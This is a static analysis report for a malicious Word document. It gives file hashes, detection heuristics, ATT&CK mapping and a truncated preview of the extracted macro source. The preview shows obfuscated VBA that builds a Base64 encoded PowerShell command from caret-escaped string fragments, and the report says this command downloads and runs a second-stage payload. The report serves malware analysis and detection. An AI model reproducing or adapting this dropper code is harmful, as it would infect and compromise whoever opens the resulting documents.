Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 08a8bce1bef765b3…

MALICIOUS

Office (OLE)

88.8 KB Created: 2018-08-17 08:16:00 Authoring application: Microsoft Office Word First seen: 2018-08-26
MD5: 93208c4b61e815ba6ae140e359cd7e38 SHA-1: 0de7239b9095421b8612d44e1404b5229426cf9d SHA-256: 08a8bce1bef765b331fb7f8cdeb4095594f24a6403fe8be73e6cb8c4e40de12b
142 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro's AutoOpen function is triggered upon opening, and it constructs and executes a Base64 encoded PowerShell command. This command is designed to download and execute a second-stage payload, indicated by the obfuscated string and the use of PowerShell. The ClamAV detection name 'Doc.Dropper.Valyria-6666905-0' further supports its role as a dropper.

Heuristics 5

  • ClamAV: Doc.Dropper.Valyria-6666905-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6666905-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43851 bytes
SHA-256: f7637633bc6f09348ecd057d3a014b9009dfefb0a2bdd3ef38e7ea4a9221d5c1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RElXjaEFEsoadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kDwtSJIPjsB"
Function QuhNsEsSuK()
On Error Resume Next
ckKFr = "oPIZEc"
   VarType CByte(4)
   IsArray Sin(PqzMhv - cGXvN - 20415 / DubBwk)
lawzOpMYozv = "mD " + "/" + "v ^  ^ " + "/r    " + CStr(Chr(DrlXfAmbVQnKz + nQOqzqoZsUi + 34 + kkGTPVtwsvEB + pzwdTfuWFUv)) + "  SET  " + " "
IsArray Val(jOoAfa)
   ckKFr = CDec(HwPiUi)
   IsArray Sqr(62)
SwwHsDmj = "^ " + "rX" + "B^" + "Q^=po^w" + "^e" + "rs^" + "h^e^l" + "l^ ^-" + "^" + "e^ JA" + "^" + "BRA^Gw" + "^A^bg^"
ckKFr = 6592386
   VarType Str(aztYzY)
   VarType TimeValue(JIHGT * jEIrm * MvcXif / 29611)
lnsFV = "A9" + "AG^4A" + "^" + "ZQ" + "^" + "B.^AC0A" + "b^w^B" + "]A^"
VarType Rnd(qTElSK)
   IsArray Atn(565)
   IsArray 8773
bWJdLoGa = "G^oAZ^" + "QBjA^" + "_^" + "Q^AI^" + "AB^" + "OAG^'^" + "Ad^" + "A"
ckKFr = "bSGER"
   ckKFr = Int(5)
   IsArray Second(GzAit)
SuHRAzOGS = "Au^" + "A/^\^" + "A^Z^QB" + "]^AE" + "^,^Ab" + "^" + "A^B^p" + "A" + "^" + "G'^Ab" + "g" + "B0"
VarType 115
   IsArray Cos(60)
IwwdC = "^A^2s" + "^A^J" + "A" + "BNA/I^" + "AR^QA9" + "^AC" + "\^A^aA"
IsArray CDate(4301)
   IsArray 340
   IsArray 2365
dBUVFIT = "^" + "B0" + "A^_^QA^" + "\A^A^6A" + "C^8^A)^" + "w^B" + "^k^AG^" + "8^Ab"
QuhNsEsSuK = lawzOpMYozv + SwwHsDmj + lnsFV + bWJdLoGa + SuHRAzOGS + IwwdC + dBUVFIT
   VarType Str(227283539)
   IsArray 845
End Function
Function TlduaiiHi()
On Error Resume Next
ckKFr = Second(72058 * cSpElc - 55921 - IspGO)
   VarType LCase(VrZJN)
   IsArray TimeValue(qtHaQY)
NbMSQ = "^Q^Bl" + "^A^_,Ad" + "^A" + "BpAG^," + "^A,gA" + "^x" + "AC4A^" + "[^wBv" + "A" + "G^0" + "^A" + ")w"
IsArray 294798985
   IsArray 3
   IsArray Sin(jIroHw)
LEGZmGR = "B^" + "I" + "A^G^'AV" + "g" + "^BJA"
ckKFr = Rnd(ZRXbGY)
   VarType "TtsUDs"
rddnhn = "2Q^A^'" + "ABA" + "^AGgA" + "^d" + "^A^B^" + "0A^_" + "AAO^g^" + "A" + "v"
IsArray TimeValue(604)
   VarType Tan(134965962)
NpzjcLMP = "AC^" + "8A^b^A" + "Bh^A" + "_^,A^Z" + "QB^yAC" + "^0" + "^A[^w^"
ckKFr = "KEnEZ"
   ckKFr = TimeValue(25)
oGmVH = "BvA^2" + "I" + "^" + "A)^g^Bj" + "^AG8Ab" + "QAu^" + "A" + "^" + "_^AAbA"
ckKFr = Month(zKJGjK + zPTllj)
   IsArray "lzvjVd"
   IsArray Round(sLFwV)
ocRjsJA = "^" + "AvA" + "^2^AA" + "Nw" + "B^_A2" + "QAV^AA4" + "A2," + "^A^Q^A^" + "B^o" + "A"
ckKFr = "LqsWi"
   VarType 9616
   ckKFr = "WiiWw"
tZDlcTZM = "_^Q^Ad^" + "A" + "^B" + "^" + "w^A^" + "2o^" + "A)w^A" + "vA^G" + "sA^\QB" + "zAC^4^A"
IsArray "TbMOzO"
   VarType "MYMKzo"
ZrqSiX = "b^" + "Q^B" + "^l^A" + "C" + "8A," + "Q^B3^" + "A" + "^2[A^e" + "^"
TlduaiiHi = NbMSQ + LEGZmGR + rddnhn + NpzjcLMP + oGmVH + ocRjsJA + tZDlcTZM + ZrqSiX
   ckKFr = "jQnRot"
   VarType CBool(26829 / ZuqNd)
End Function
Function rHfAPtqzw()
On Error Resume Next
IsArray "iaIjkF"
   VarType CByte(9673 * CHnAz * 50146 - KKWDWt)
   IsArray Sin(94)
hjojizCi = "QBXA^_" + "^g^" + "A^" + "\A^BA" + "AG^g" + "^AdA^"
IsArray 4
   ckKFr = CByte(418)
   IsArray 11
IsHPkaOJmPm = "B" + "0A" + "^_AAO^g" + "AvA" + "C8^A" + "b^Q^" + "B^l^A" + "^G^"
ckKFr = 24
   IsArray Atn(16059151)
   VarType CDate(tumCXa)
JJvfWQFBCfp = "Q^Aa^" + "QB" + "v^AG^" + "4^A" + ")g^B]AG" + "^EA)w" + "^BuA" + "_"
ckKFr = Second(86399 - SmtMW + 18190 + FTGiU)
   VarType 8
   ckKFr = "DXkzw"
jVGXKksXm = "o" + "A^e" + "^" + "g^A^y" + "^A/,A"
ckKFr = Int(jOrCi)
   ckKFr = "ZKbHaV"
tzkMvNu = "Q^ABoA^" + "_^QA" + "d^ABw^" + "A" + "2oA)w^A" + "vA_^" + "g^A^bg" + "^AtAC" + "0A^Z^Q"
VarType Atn(apwTC)
   IsArray "bTETL"
   IsArray LCase(XXRnMj + OiDzKa)
HzwfpGqbZi = "^AxA^" + "G^E^" + "A^Z^w" + "B^t^" + "A^G" + ",A" + "Z^w^Bh" + "A" + "G^\" + "AZ^A" + "^Br^"
rHfAPtqzw = hjojizCi + IsHPkaOJmPm + JJvfWQFBCfp + jVGXKksXm + tzkMvNu + HzwfpGqbZi
   ckKFr = Str(nAjXcQ + TjwBR * CFbDqT - rEnTNl)
   IsArray Atn(2)
End 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.